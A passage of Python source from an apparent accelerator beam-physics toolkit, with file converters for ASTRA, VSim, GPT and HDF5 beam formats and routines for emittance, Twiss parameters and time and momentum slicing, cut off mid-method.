        x, y, z, cpx, cpy, cpz = np.transpose(data)
        cp = np.sqrt(cpx**2 + cpy**2 + cpz**2)
        self.beam['x'] = x
        self.beam['y'] = y
        self.beam['z'] = z
        # momenta scaled by q_over_c (presumably eV/c -> SI; confirm)
        self.beam['px'] = cpx * self.q_over_c
        self.beam['py'] = cpy * self.q_over_c
        self.beam['pz'] = cpz * self.q_over_c
        # t reconstructed from z and beta_z
        self.beam['t'] = [(z / (-1 * Bz * constants.speed_of_light)) for z, Bz in zip(self.z, self.Bz)]
        # self.beam['t'] = self.z / (1 * self.Bz * constants.speed_of_light)#[time if status is -1 else 0 for time, status in zip(clock, status)]#
        self.beam['total_charge'] = charge
        self.beam['charge'] = []
def convert_csrtrackfile_to_astrafile(self, csrtrackfile, astrafile):
data = self.read_csv_file(csrtrackfile)
z, x, y, cpz, cpx, cpy, charge = np.transpose(data[1:])
charge = -charge*1e9
clock0 = (data[0, 0] / constants.speed_of_light) * 1e9
clock = np.full(len(x), 0)
clock[0] = clock0
index = np.full(len(x), 1)
status = np.full(len(x), 5)
array = np.array([x, y, z, cpx, cpy, cpz, clock, charge, index, status]).transpose()
self.write_csv_file(astrafile, array)
def find_nearest_vector(self, nodes, node):
return cdist([node], nodes).argmin()
def rms(self, x, axis=None):
return np.sqrt(np.mean(x**2, axis=axis))
def create_ref_particle(self, array, index=0, subtractmean=False):
array[1:] = array[0] + array[1:]
if subtractmean:
array = array - np.mean(array)
return array
    def write_astra_beam_file(self, file, index=1, status=5, charge=None, normaliseZ=False):
        """Write self.beam to an ASTRA-format text file.

        index/status fill the ASTRA index and status columns (status falls
        back to self.beam['status'] when present).  If no reference particle
        was stored, the row closest to the normalised column means is
        promoted to reference and rolled to row 0; z, pz and clock of the
        other rows are then made relative to it as ASTRA expects.
        NOTE(review): the first isinstance(index, ...) guard wraps the
        *charge* vector construction - it looks like it should test the
        'charge' argument instead; confirm before changing.
        """
        if not isinstance(index,(list, tuple, np.ndarray)):
            if len(self.beam['charge']) == len(self.x):
                chargevector = 1e9*self.beam['charge']
            else:
                chargevector = np.full(len(self.x), 1e9*self.charge/len(self.x))
        if not isinstance(index,(list, tuple, np.ndarray)):
            indexvector = np.full(len(self.x), index)
        statusvector = self.beam['status'] if 'status' in self.beam else status if isinstance(status,(list, tuple, np.ndarray)) else np.full(len(self.x), status)
        ''' if a particle is emitting from the cathode it's z value is 0 and it's clock value is finite, otherwise z is finite and clock is irrelevant (thus zero) '''
        if self.beam['longitudinal_reference'] == 't':
            zvector = [0 if status == -1 and t == 0 else z for status, z, t in zip(statusvector, self.z, self.t)]
        else:
            zvector = self.z
        ''' if the clock value is finite, we calculate it from the z value, using Betaz '''
        # clockvector = [1e9*z / (1 * Bz * constants.speed_of_light) if status == -1 and t == 0 else 1.0e9*t for status, z, t, Bz in zip(statusvector, self.z, self.t, self.Bz)]
        clockvector = [1.0e9*t for status, z, t, Bz in zip(statusvector, self.z, self.t, self.Bz)]
        ''' this is the ASTRA array in all it's glory '''
        array = np.array([self.x, self.y, zvector, self.cpx, self.cpy, self.cpz, clockvector, chargevector, indexvector, statusvector]).transpose()
        if 'reference_particle' in self.beam:
            ref_particle = self.beam['reference_particle']
            # print 'we have a reference particle! ', ref_particle
            # np.insert(array, 0, ref_particle, axis=0)
        else:
            ''' take the rms - if the rms is 0 set it to 1, so we don't get a divide by error '''
            rms_vector = [a if abs(a) > 0 else 1 for a in self.rms(array, axis=0)]
            ''' normalise the array '''
            norm_array = array / rms_vector
            ''' take the meen of the normalised array '''
            mean_vector = np.mean(norm_array, axis=0)
            ''' find the index of the vector that is closest to the mean - if you read in an ASTRA file, this should actually return the reference particle! '''
            nearest_idx = self.find_nearest_vector(norm_array, mean_vector);
            ref_particle = array[nearest_idx]
            ''' set the closest mean vector to be in position 0 in the array '''
            array = np.roll(array, -1*nearest_idx, axis=0)
        ''' normalise Z to the reference particle '''
        array[1:,2] = array[1:,2] - ref_particle[2]
        ''' should we leave Z as the reference value, set it to 0, or set it to be some offset? '''
        if not normaliseZ is False:
            array[0,2] = 0
        if not isinstance(normaliseZ,(bool)):
            array[0,2] += normaliseZ
        ''' normalise pz and the clock '''
        # print('Mean pz = ', np.mean(array[:,5]))
        array[1:,5] = array[1:,5] - ref_particle[5]
        array[0,6] = array[0,6] + ref_particle[6]
        np.savetxt(file, array, fmt=('%.12e','%.12e','%.12e','%.12e','%.12e','%.12e','%.12e','%.12e','%d','%d'))
    def write_vsim_beam_file(self, file, normaliseT=False):
        """Write self.beam as a VSim-style text file (z y x then gamma*beta*c components).

        normaliseT recentres both t and z on their means before writing.
        Particles with z == 0 get z reconstructed from t and beta_z.
        """
        if len(self.beam['charge']) == len(self.x):
            chargevector = self.beam['charge']
        else:
            chargevector = np.full(len(self.x), self.beam['total_charge']/len(self.x))
        if normaliseT:
            tvector = self.t - np.mean(self.t)
            zvector = self.z - np.mean(self.z)
        else:
            tvector = self.t
            zvector = self.z
        zvector = [t * (1 * Bz * constants.speed_of_light) if z == 0 else z for z, t, Bz in zip(zvector, tvector, self.Bz)]
        ''' this is the VSIM array in all it's glory '''
        array = np.array([zvector, self.y, self.x, self.Bz*self.gamma*constants.speed_of_light, self.By*self.gamma*constants.speed_of_light, self.Bx*self.gamma*constants.speed_of_light]).transpose()
        ''' take the rms - if the rms is 0 set it to 1, so we don't get a divide by error '''
        np.savetxt(file, array, fmt=('%.12e','%.12e','%.12e','%.12e','%.12e','%.12e'))
def write_gdf_beam_file(self, filename, normaliseZ=False):
q = np.full(len(self.x), -1 * constants.elementary_charge)
m = np.full(len(self.x), constants.electron_mass)
nmacro = np.full(len(self.x), abs(self.beam['total_charge'] / constants.elementary_charge / len(self.x)))
toffset = np.mean(self.z / (self.Bz * constants.speed_of_light))
z = self.z if not normaliseZ else (self.z - np.mean(self.z))
dataarray = np.array([self.x, self.y, z, q, m, nmacro, self.gamma*self.Bx, self.gamma*self.By, self.gamma*self.Bz]).transpose()
namearray = 'x y z q m nmacro GBx GBy GBz'
np.savetxt(filename, dataarray, fmt=('%.12e','%.12e','%.12e','%.12e','%.12e','%.12e','%.12e','%.12e','%.12e'), header=namearray, comments='')
def read_gdf_beam_file_object(self, file):
if isinstance(file, (str)):
gdfbeam = rgf.read_gdf_file(file)
elif isinstance(file, (rgf.read_gdf_file)):
gdfbeam = file
else:
raise Exception('file is not str or gdf object!')
return gdfbeam
    def calculate_gdf_s(self, file):
        """Build a monotonically increasing s coordinate from gdf screen positions.

        Positions are ordered by average arrival time; whenever the position
        sequence wraps backwards, the previous position is accumulated as an
        offset so s keeps growing.
        """
        gdfbeam = self.read_gdf_beam_file_object(file)
        datagrab = gdfbeam.get_grab(0)
        avgt = [datagrab.avgt]
        position = [datagrab.position]
        # sort the screen positions by their average time
        sposition = list(zip(*list(sorted(zip(avgt[0], position[0])))))[1]
        # pair each position with its successor (the last pairs with 0)
        ssposition = list(zip(sposition, list(sposition[1:])+[0]))
        offset = 0
        spos = []
        for p1,p2 in ssposition:
            spos += [p1 + offset]
            if p2 < p1:
                offset += p1
        return spos
    def calculate_gdf_eta(self, file):
        """Compute dispersion (eta_x, eta_x') at every gdf position with particles.

        Each stored position is loaded in turn and self.calculate_etax()
        evaluated; results are returned sorted by time.
        """
        gdfbeam = self.read_gdf_beam_file_object(file)
        etax = []
        etaxp = []
        tp = []
        for p in gdfbeam.positions:
            self.read_gdf_beam_file(gdfbeam=gdfbeam, position=p)
            if len(self.x) > 0:
                e, ep, t = self.calculate_etax()
                etax += [e]
                etaxp += [ep]
                tp += [t]
        # sort by time and strip the time column
        etax, etaxp = list(zip(*list(sorted(zip(tp, etax, etaxp)))))[1:]
        return etax, etaxp
    def read_gdf_beam_file_info(self, file):
        """Print the grab groups, positions and times available in a gdf beam file."""
        self.reset_dicts()
        gdfbeamdata = None
        gdfbeam = self.read_gdf_beam_file_object(file)
        print('grab_groups = ', gdfbeam.grab_groups)
        print(( 'Positions = ', gdfbeam.positions))
        print(( 'Times = ', gdfbeam.times))
    def read_gdf_beam_file(self, file=None, position=None, time=None, block=None, charge=None, longitudinal_reference='t', gdfbeam=None):
        """Load one grab from a GPT gdf beam file into self.beam.

        Selection priority: position, then time (+block), then block, then
        grab 0.  Either *file* (path or gdf object) or a pre-loaded
        *gdfbeam* must be supplied; returns the gdfbeam object for re-use,
        or None if neither was given.  *charge* (Coulombs) is used as total
        charge when the file carries no q/nmacro data.
        """
        self.reset_dicts()
        if gdfbeam is None and not file is None:
            gdfbeam = self.read_gdf_beam_file_object(file)
        elif gdfbeam is None and file is None:
            return None
        if position is not None:# and (time is not None or block is not None):
            # print 'Assuming position over time!'
            self.beam['longitudinal_reference'] = 't'
            gdfbeamdata = gdfbeam.get_position(position)
            if gdfbeamdata is not None:
                # print('GDF found position ', position)
                time = None
                block = None
            else:
                print('GDF DID NOT find position ', position)
                position = None
        elif position is None and time is not None and block is not None:
            # print 'Assuming time over block!'
            # NOTE(review): reference set to 'p' here, unlike the other branches - confirm intent
            self.beam['longitudinal_reference'] = 'p'
            gdfbeamdata = gdfbeam.get_time(time)
            if gdfbeamdata is not None:
                block = None
            else:
                time = None
        elif position is None and time is None and block is not None:
            gdfbeamdata = gdfbeam.get_grab(block)
            if gdfbeamdata is None:
                block = None
        elif position is None and time is None and block is None:
            # no selector given: fall back to the first grab
            gdfbeamdata = gdfbeam.get_grab(0)
        self.beam['code'] = "GPT"
        self.beam['x'] = gdfbeamdata.x
        self.beam['y'] = gdfbeamdata.y
        if hasattr(gdfbeamdata,'z') and longitudinal_reference == 'z':
            # print( 'z!')
            # print(( gdfbeamdata.z))
            self.beam['z'] = gdfbeamdata.z
            self.beam['t'] = np.full(len(self.z), 0)# self.z / (-1 * self.Bz * constants.speed_of_light)
        elif hasattr(gdfbeamdata,'t') and longitudinal_reference == 't':
            # print( 't!')
            self.beam['t'] = gdfbeamdata.t
            # reconstruct z around the mean arrival time using beta_z
            self.beam['z'] = (-1 * gdfbeamdata.Bz * constants.speed_of_light) * (gdfbeamdata.t-np.mean(gdfbeamdata.t)) + gdfbeamdata.z
        self.beam['gamma'] = gdfbeamdata.G
        if hasattr(gdfbeamdata,'q') and hasattr(gdfbeamdata,'nmacro'):
            self.beam['charge'] = gdfbeamdata.q * gdfbeamdata.nmacro
            self.beam['total_charge'] = np.sum(self.beam['charge'])
        else:
            if charge is None:
                self.beam['total_charge'] = 0
            else:
                self.beam['total_charge'] = charge
        # print(( self.beam['charge']))
        vx = gdfbeamdata.Bx * constants.speed_of_light
        vy = gdfbeamdata.By * constants.speed_of_light
        vz = gdfbeamdata.Bz * constants.speed_of_light
        # p = gamma * m * v (division by 1/(m*gamma))
        velocity_conversion = 1 / (constants.m_e * self.beam['gamma'])
        self.beam['px'] = vx / velocity_conversion
        self.beam['py'] = vy / velocity_conversion
        self.beam['pz'] = vz / velocity_conversion
        return gdfbeam
    def rotate_beamXZ(self, theta, preOffset=[0,0,0], postOffset=[0,0,0]):
        """Rotate positions and momenta by *theta* about the Y axis.

        Positions are shifted by preOffset, rotated, then shifted by
        postOffset; momenta (and the stored reference particle, if any) are
        rotated only.  theta and preOffset are stored so unrotate_beamXZ can
        undo the transform.
        """
        preOffset=np.array(preOffset)
        postOffset=np.array(postOffset)
        rotation_matrix = np.array([[np.cos(theta), 0, np.sin(theta)], [0, 1, 0], [-1*np.sin(theta), 0, np.cos(theta)]])
        beam = np.array([self.x,self.y,self.z]).transpose()
        self.beam['x'],self.beam['y'],self.beam['z'] = (np.dot(beam-preOffset, rotation_matrix)-postOffset).transpose()
        beam = np.array([self.px, self.py, self.pz]).transpose()
        self.beam['px'], self.beam['py'], self.beam['pz'] = np.dot(beam, rotation_matrix).transpose()
        if 'reference_particle' in self.beam:
            # rotate the reference particle's position (cols 0-2) and momentum (cols 3-5) too
            beam = np.array([self.beam['reference_particle'][0], self.beam['reference_particle'][1], self.beam['reference_particle'][2]])
            self.beam['reference_particle'][0], self.beam['reference_particle'][1], self.beam['reference_particle'][2] = (np.dot([beam-preOffset], rotation_matrix)[0]-postOffset)
            # print 'rotated ref part = ', np.dot([beam-preOffset], rotation_matrix)[0]
            beam = np.array([self.beam['reference_particle'][3], self.beam['reference_particle'][4], self.beam['reference_particle'][5]])
            self.beam['reference_particle'][3], self.beam['reference_particle'][4], self.beam['reference_particle'][5] = np.dot([beam], rotation_matrix)[0]
        self.beam['rotation'] = theta
        self.beam['offset'] = preOffset
def unrotate_beamXZ(self):
offset = self.beam['offset'] if 'offset' in self.beam else np.array([0,0,0])
if 'rotation' in self.beam or abs(self.beam['rotation']) > 0:
self.rotate_beamXZ(-1*self.beam['rotation'], -1*offset)
    def write_HDF5_beam_file(self, filename, centered=False, mass=constants.m_e, sourcefilename=None, pos=None, rotation=None, longitudinal_reference='t', zoffset=0):
        """Write self.beam to the project's HDF5 beam format.

        zoffset may be a scalar z shift or a 3-vector [x, y, z] of shifts.
        Metadata (source file, starting position, rotation, charge, particle
        count, mass) goes in /Parameters; the particle array plus column
        names/units go in /beam.
        """
        # print('zoffset = ', zoffset, type(zoffset))
        if isinstance(zoffset,(list, np.ndarray)) and len(zoffset) == 3:
            # a 3-vector offset applies to x, y and z
            xoffset = zoffset[0]
            yoffset = zoffset[1]
            zoffset = zoffset[2]
        else:
            xoffset = 0
            yoffset = 0
        # print('xoffset = ', xoffset)
        # print('yoffset = ', yoffset)
        # print('zoffset = ', zoffset)
        with h5py.File(filename, "w") as f:
            inputgrp = f.create_group("Parameters")
            if not 'total_charge' in self.beam or self.beam['total_charge'] == 0:
                self.beam['total_charge'] = np.sum(self.beam['charge'])
            if sourcefilename is not None:
                inputgrp['Source'] = sourcefilename
            if pos is not None:
                inputgrp['Starting_Position'] = pos
            else:
                inputgrp['Starting_Position'] = [0, 0, 0]
            if rotation is not None:
                inputgrp['Rotation'] = rotation
            else:
                inputgrp['Rotation'] = 0
            inputgrp['total_charge'] = self.beam['total_charge']
            inputgrp['npart'] = len(self.x)
            inputgrp['centered'] = centered
            inputgrp['code'] = self.beam['code']
            inputgrp['particle_mass'] = mass
            beamgrp = f.create_group("beam")
            if 'reference_particle' in self.beam:
                beamgrp['reference_particle'] = self.beam['reference_particle']
            if 'status' in self.beam:
                beamgrp['status'] = self.beam['status']
            beamgrp['longitudinal_reference'] = longitudinal_reference
            # per-particle charge if available, otherwise spread total evenly
            if len(self.beam['charge']) == len(self.x):
                chargevector = self.beam['charge']
            else:
                chargevector = np.full(len(self.x), self.charge/len(self.x))
            array = np.array([self.x + xoffset, self.y + yoffset, self.z + zoffset, self.cpx, self.cpy, self.cpz, self.t, chargevector]).transpose()
            beamgrp['columns'] = np.array(['x','y','z', 'cpx', 'cpy', 'cpz', 't', 'q'], dtype='S')
            beamgrp['units'] = np.array(['m','m','m','eV','eV','eV','s','e'], dtype='S')
            beamgrp.create_dataset("beam", data=array)
    def read_HDF5_beam_file(self, filename, local=False):
        """Load a beam previously written by write_HDF5_beam_file.

        When *local* is True the beam is rotated back into its local frame
        using the stored rotation and starting position.
        """
        self.reset_dicts()
        with h5py.File(filename, "r") as h5file:
            if h5file.get('beam/reference_particle') is not None:
                self.beam['reference_particle'] = np.array(h5file.get('beam/reference_particle'))
            if h5file.get('beam/longitudinal_reference') is not None:
                self.beam['longitudinal_reference'] = np.array(h5file.get('beam/longitudinal_reference'))
            else:
                self.beam['longitudinal_reference'] = 't'
            if h5file.get('beam/status') is not None:
                self.beam['status'] = np.array(h5file.get('beam/status'))
            x, y, z, cpx, cpy, cpz, t, charge = np.array(h5file.get('beam/beam')).transpose()
            cp = np.sqrt(cpx**2 + cpy**2 + cpz**2)
            self.beam['x'] = x
            self.beam['y'] = y
            self.beam['z'] = z
            # self.beam['cpx'] = cpx
            # self.beam['cpy'] = cpy
            # self.beam['cpz'] = cpz
            # momenta scaled by q_over_c (stored units are eV per the writer's units table)
            self.beam['px'] = cpx * self.q_over_c
            self.beam['py'] = cpy * self.q_over_c
            self.beam['pz'] = cpz * self.q_over_c
            # self.beam['cp'] = cp
            # self.beam['p'] = cp * self.q_over_c
            # self.beam['xp'] = np.arctan(self.px/self.pz)
            # self.beam['yp'] = np.arctan(self.py/self.pz)
            self.beam['clock'] = np.full(len(self.x), 0)
            # self.beam['gamma'] = np.sqrt(1+(self.cp/self.E0_eV)**2)
            # velocity_conversion = 1 / (constants.m_e * self.gamma)
            # self.beam['vx'] = velocity_conversion * self.px
            # self.beam['vy'] = velocity_conversion * self.py
            # self.beam['vz'] = velocity_conversion * self.pz
            # self.beam['Bx'] = self.vx / constants.speed_of_light
            # self.beam['By'] = self.vy / constants.speed_of_light
            # self.beam['Bz'] = self.vz / constants.speed_of_light
            self.beam['t'] = t
            self.beam['charge'] = charge
            self.beam['total_charge'] = np.sum(self.beam['charge'])
            startposition = np.array(h5file.get('/Parameters/Starting_Position'))
            startposition = startposition if startposition is not None else [0,0,0]
            self.beam['starting_position'] = startposition
            theta = np.array(h5file.get('/Parameters/Rotation'))
            theta = theta if theta is not None else 0
            self.beam['rotation'] = theta
            if local == True:
                self.rotate_beamXZ(self.beam['rotation'], preOffset=self.beam['starting_position'])
''' ******************** Statistical Parameters ************************* '''
    def kde_function(self, x, bandwidth=0.2, **kwargs):
        """Kernel Density Estimation with Scipy (memoised on sample and bandwidth)"""
        # Note that scipy weights its bandwidth by the covariance of the
        # input data. To make the results comparable to the other methods,
        # we divide the bandwidth by the sample standard deviation here.
        # Taken from https://jakevdp.github.io/blog/2013/12/01/kernel-density-estimation/
        # Only rebuild the KDE when the cached sample or bandwidth changed.
        if not hasattr(self, '_kde_x') or not len(x) == len(self._kde_x) or not np.allclose(x, self._kde_x) or not bandwidth == self._kde_bandwidth:
            self._kde_x = x
            self._kde_bandwidth = bandwidth
            self._kde_function = gaussian_kde(x, bw_method=bandwidth / x.std(ddof=1), **kwargs)
        return self._kde_function
def PDF(self, x, x_grid, bandwidth=0.2, **kwargs):
kde = self.kde_function(x, bandwidth, **kwargs)
return kde.evaluate(x_grid)
def PDFI(self, x, x_grid, bandwidth=0.2, **kwargs):
kde = self.kde_function(x, bandwidth, **kwargs)
vals = kde.evaluate(x_grid)
f = lambda bin, val: self.charge / len(self.t) * (val / bin)
return vals#self.charge * vals / (2*abs(x_grid[1] - x_grid[0])) / len(self.t) #[f(x_grid[1] - x_grid[0], v) for v in vals]
def CDF(self, x, x_grid, bandwidth=0.2, **kwargs):
kde = self.kde_function(x, bandwidth, **kwargs)
cdf = np.vectorize(lambda e: kde.integrate_box_1d(x_grid[0], e))
return cdf(x_grid)
def FWHM(self, X, Y, frac=0.5):
frac = 1.0/frac if frac > 1 else frac
d = Y - (max(Y) * frac)
indexes = np.where(d > 0)[0]
return abs(X[indexes][-1] - X[indexes][0]), indexes
def covariance(self, u, up):
u2 = u - np.mean(u)
up2 = up - np.mean(up)
return np.mean(u2*up2) - np.mean(u2)*np.mean(up2)
def emittance(self, x, xp, p=None):
cov_x = self.covariance(x, x)
cov_xp = self.covariance(xp, xp)
cov_x_xp = self.covariance(x, xp)
emittance = np.sqrt(cov_x * cov_xp - cov_x_xp**2) if (cov_x * cov_xp - cov_x_xp**2) > 0 else 0
if p is None:
return emittance
else:
gamma = np.mean(p)/self.E0_eV
return gamma*emittance
    @property
    def volume(self):
        # 6D convex-hull volume of the whole bunch (z centred on its mean,
        # transverse slopes cpx/cpz, cpy/cpz, fractional momentum deviation)
        return self.volume6D(self.x, self.y, self.z-np.mean(self.z), self.cpx/self.cpz, self.cpy/self.cpz, ((self.cpz/np.mean(self.cp)) - 1))
    @property
    def density(self):
        # macro-particles per unit 6D phase-space volume
        return len(self.x) / self.volume
def volume6D(self, x, y, t, xp, yp, cp):
if len(x) < 10:
return 1e6
else:
beam = list(zip(x, y, t, xp, yp, cp))
return ConvexHull(beam, qhull_options='QJ').volume
    def mve_emittance(self, x, xp, p=None):
        """Minimum-volume-ellipse emittance of (x, xp): the product of the
        fitted ellipse's radii, normalised by mean(p)/E0_eV if *p* is given."""
        (center, radii, rotation, hullP) = MVE.getMinVolEllipse(list(zip(x,xp)), .01)
        emittance = radii[0] * radii[1]
        if p is None:
            return emittance
        else:
            gamma = np.mean(p)/self.E0_eV
            return gamma*emittance
    @property
    def normalized_horizontal_emittance(self):
        # statistical emittance scaled by mean momentum
        return self.emittance(self.x, self.xp, self.cp)
    @property
    def normalized_vertical_emittance(self):
        # statistical emittance scaled by mean momentum
        return self.emittance(self.y, self.yp, self.cp)
    @property
    def horizontal_emittance(self):
        # geometric (unnormalised) statistical emittance
        return self.emittance(self.x, self.xp)
    @property
    def vertical_emittance(self):
        # geometric (unnormalised) statistical emittance
        return self.emittance(self.y, self.yp)
    @property
    def normalized_mve_horizontal_emittance(self):
        # minimum-volume-ellipse emittance scaled by mean momentum
        return self.mve_emittance(self.x, self.xp, self.cp)
    @property
    def normalized_mve_vertical_emittance(self):
        # minimum-volume-ellipse emittance scaled by mean momentum
        return self.mve_emittance(self.y, self.yp, self.cp)
    @property
    def horizontal_mve_emittance(self):
        # geometric minimum-volume-ellipse emittance
        return self.mve_emittance(self.x, self.xp)
    @property
    def vertical_mve_emittance(self):
        # geometric minimum-volume-ellipse emittance
        return self.mve_emittance(self.y, self.yp)
    @property
    def horizontal_emittance_90(self):
        # 90% emittance: per-particle Courant-Snyder action, 90th percentile
        # NOTE(review): 'emit' is computed but unused (aside from any caching
        # side effect of the property) - confirm before removing.
        emit = self.horizontal_emittance
        alpha = self.alpha_x
        beta = self.beta_x
        gamma = self.gamma_x
        emiti = gamma * self.x**2 + 2 * alpha * self.x * self.xp + beta * self.xp * self.xp
        return sorted(emiti)[int(0.9*len(emiti)-0.5)]
    @property
    def normalized_horizontal_emittance_90(self):
        # 90% emittance scaled by mean momentum
        emit = self.horizontal_emittance_90
        return np.mean(self.cp)/self.E0_eV * emit
    @property
    def vertical_emittance_90(self):
        # 90% emittance: per-particle Courant-Snyder action, 90th percentile
        emit = self.vertical_emittance
        alpha = self.alpha_y
        beta = self.beta_y
        gamma = self.gamma_y
        emiti = gamma * self.y**2 + 2 * alpha * self.y * self.yp + beta * self.yp * self.yp
        return sorted(emiti)[int(0.9*len(emiti)-0.5)]
    @property
    def normalized_vertical_emittance_90(self):
        # 90% emittance scaled by mean momentum
        emit = self.vertical_emittance_90
        return np.mean(self.cp)/self.E0_eV * emit
    @property
    def beta_x(self):
        # Twiss beta_x = <x^2> / emittance
        self.twiss['beta_x'] = self.covariance(self.x,self.x) / self.horizontal_emittance
        return self.twiss['beta_x']
    @property
    def alpha_x(self):
        # Twiss alpha_x = -<x x'> / emittance
        self.twiss['alpha_x'] = -1*self.covariance(self.x,self.xp) / self.horizontal_emittance
        return self.twiss['alpha_x']
    @property
    def gamma_x(self):
        # Twiss gamma_x = <x'^2> / emittance
        self.twiss['gamma_x'] = self.covariance(self.xp,self.xp) / self.horizontal_emittance
        return self.twiss['gamma_x']
    @property
    def beta_y(self):
        # Twiss beta_y = <y^2> / emittance
        self.twiss['beta_y'] = self.covariance(self.y,self.y) / self.vertical_emittance
        return self.twiss['beta_y']
    @property
    def alpha_y(self):
        # Twiss alpha_y = -<y y'> / emittance
        self.twiss['alpha_y'] = -1*self.covariance(self.y,self.yp) / self.vertical_emittance
        return self.twiss['alpha_y']
    @property
    def gamma_y(self):
        # Twiss gamma_y = <y'^2> / emittance
        self.twiss['gamma_y'] = self.covariance(self.yp,self.yp) / self.vertical_emittance
        return self.twiss['gamma_y']
    @property
    def twiss_analysis(self):
        # convenience tuple: (emit, alpha, beta, gamma) for both planes
        return self.horizontal_emittance, self.alpha_x, self.beta_x, self.gamma_x, self.vertical_emittance, self.alpha_y, self.beta_y, self.gamma_y
    def eta_correlation(self, u):
        # linear correlation of u with momentum: cov(u, p) / cov(p, p)
        return self.covariance(u,self.p) / self.covariance(self.p, self.p)
    def eta_corrected(self, u):
        # remove the momentum-correlated (dispersive) component from u
        return u - self.eta_correlation(u)*self.p
    @property
    def horizontal_emittance_corrected(self):
        # emittance after removing the momentum-correlated component from x, x'
        xc = self.eta_corrected(self.x)
        xpc = self.eta_corrected(self.xp)
        return self.emittance(xc, xpc)
    @property
    def vertical_emittance_corrected(self):
        # emittance after removing the momentum-correlated component from y, y'
        yc = self.eta_corrected(self.y)
        ypc = self.eta_corrected(self.yp)
        return self.emittance(yc, ypc)
    @property
    def beta_x_corrected(self):
        # dispersion-corrected Twiss beta_x
        xc = self.eta_corrected(self.x)
        self.twiss['beta_x'] = self.covariance(xc, xc) / self.horizontal_emittance_corrected
        return self.twiss['beta_x']
    @property
    def alpha_x_corrected(self):
        # dispersion-corrected Twiss alpha_x
        xc = self.eta_corrected(self.x)
        xpc = self.eta_corrected(self.xp)
        self.twiss['alpha_x'] = -1*self.covariance(xc, xpc) / self.horizontal_emittance_corrected
        return self.twiss['alpha_x']
    @property
    def gamma_x_corrected(self):
        # dispersion-corrected Twiss gamma_x
        xpc = self.eta_corrected(self.xp)
        self.twiss['gamma_x'] = self.covariance(xpc, xpc) / self.horizontal_emittance_corrected
        return self.twiss['gamma_x']
    @property
    def beta_y_corrected(self):
        # dispersion-corrected Twiss beta_y
        yc = self.eta_corrected(self.y)
        self.twiss['beta_y'] = self.covariance(yc,yc) / self.vertical_emittance_corrected
        return self.twiss['beta_y']
    @property
    def alpha_y_corrected(self):
        # dispersion-corrected Twiss alpha_y
        yc = self.eta_corrected(self.y)
        ypc = self.eta_corrected(self.yp)
        self.twiss['alpha_y'] = -1*self.covariance(yc, ypc) / self.vertical_emittance_corrected
        return self.twiss['alpha_y']
    @property
    def gamma_y_corrected(self):
        # dispersion-corrected Twiss gamma_y
        ypc = self.eta_corrected(self.yp)
        self.twiss['gamma_y'] = self.covariance(ypc,ypc) / self.vertical_emittance_corrected
        return self.twiss['gamma_y']
    @property
    def twiss_analysis_corrected(self):
        # convenience tuple of all dispersion-corrected Twiss parameters
        return self.horizontal_emittance_corrected, self.alpha_x_corrected, self.beta_x_corrected, self.gamma_x_corrected, \
                self.vertical_emittance_corrected, self.alpha_y_corrected, self.beta_y_corrected, self.gamma_y_corrected
    @property
    def slice_length(self):
        # time width of one longitudinal slice (seconds)
        return self._slicelength
    @slice_length.setter
    def slice_length(self, slicelength):
        self._slicelength = slicelength
    @property
    def slices(self):
        # number of longitudinal slices
        return self._slices
    @slices.setter
    def slices(self, slices):
        """Set the slice count; 0 selects one slice per 0.1 ps of bunch length."""
        twidth = (max(self.t) - min(self.t))
        if twidth == 0:
            # degenerate t (e.g. z-referenced data): reconstruct t from z and beta_z
            t = self.z / (-1 * self.Bz * constants.speed_of_light)
            twidth = (max(t) - min(t))
        if slices == 0:
            slices = int(twidth / 0.1e-12)
        self._slices = slices
        self._slicelength = twidth / self._slices
    def bin_time(self):
        """Histogram the bunch into time slices.

        Caches the bin edges in self.slice['t_Bins'] and, per slice, the
        boolean masks (_tfbins), arrival times (_tbins) and momenta
        (_cpbins) used by the slice_* properties.
        """
        if not hasattr(self,'slice'):
            self.slice = {}
        if not hasattr(self,'_slicelength'):
            self.slice_length = 0
            # print("Assuming slice length is 100 fs")
        twidth = (max(self.t) - min(self.t))
        if twidth == 0:
            # degenerate t: reconstruct from z and beta_z
            t = self.z / (-1 * self.Bz * constants.speed_of_light)
            twidth = (max(t) - min(t))
        else:
            t = self.t
        if not self.slice_length > 0.0:
            # default to 20 slices across the bunch
            self.slice_length = twidth / 20.0
        # +2 bins and padded range give an empty guard slice at each end
        nbins = max([1,int(np.ceil(twidth / self.slice_length))])+2
        self._hist, binst = np.histogram(t, bins=nbins, range=(min(t)-self.slice_length, max(t)+self.slice_length))
        self.slice['t_Bins'] = binst
        self._t_binned = np.digitize(t, self.slice['t_Bins'])
        self._tfbins = [[self._t_binned == i] for i in range(1, len(binst))]
        self._tbins = [np.array(self.t)[tuple(tbin)] for tbin in self._tfbins]
        self._cpbins = [np.array(self.cp)[tuple(tbin)] for tbin in self._tfbins]
    def bin_momentum(self, width=10**6):
        """Histogram the bunch into momentum slices of the given *width*
        (width=None divides the momentum range by self.slices instead).

        Caches bin edges in self.slice['cp_Bins'] plus per-slice masks,
        momenta and times, mirroring bin_time.
        """
        if not hasattr(self,'slice'):
            self.slice = {}
        pwidth = (max(self.cp) - min(self.cp))
        if width is None:
            self.slice_length_cp = pwidth / self.slices
        else:
            self.slice_length_cp = width
        # +2 bins and padded range give an empty guard slice at each end
        nbins = max([1,int(np.ceil(pwidth / self.slice_length_cp))])+2
        self._hist, binst = np.histogram(self.cp, bins=nbins, range=(min(self.cp)-self.slice_length_cp, max(self.cp)+self.slice_length_cp))
        self.slice['cp_Bins'] = binst
        self._cp_binned = np.digitize(self.cp, self.slice['cp_Bins'])
        self._tfbins = [np.array([self._cp_binned == i]) for i in range(1, len(binst))]
        self._cpbins = [self.cp[tuple(cpbin)] for cpbin in self._tfbins]
        self._tbins = [self.t[tuple(cpbin)] for cpbin in self._tfbins]
    @property
    def slice_bins(self):
        # centre times of the longitudinal slices
        if not hasattr(self,'slice'):
            self.bin_time()
        bins = self.slice['t_Bins']
        return (bins[:-1] + bins[1:]) / 2
        # return [t.mean() for t in ]
    @property
    def slice_cpbins(self):
        # centre momenta of the momentum slices
        if not hasattr(self,'slice'):
            self.bin_momentum()
        bins = self.slice['cp_Bins']
        return (bins[:-1] + bins[1:]) / 2
        # return [t.mean() for t in ]
    @property
    def slice_momentum(self):
        # mean momentum per time slice (0 for empty slices)
        if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'):
            self.bin_time()
        self.slice['Momentum'] = np.array([cpbin.mean() if len(cpbin) > 0 else 0 for cpbin in self._cpbins ])
        return self.slice['Momentum']
    @property
    def slice_momentum_spread(self):
        # rms momentum spread per time slice (0 for empty slices)
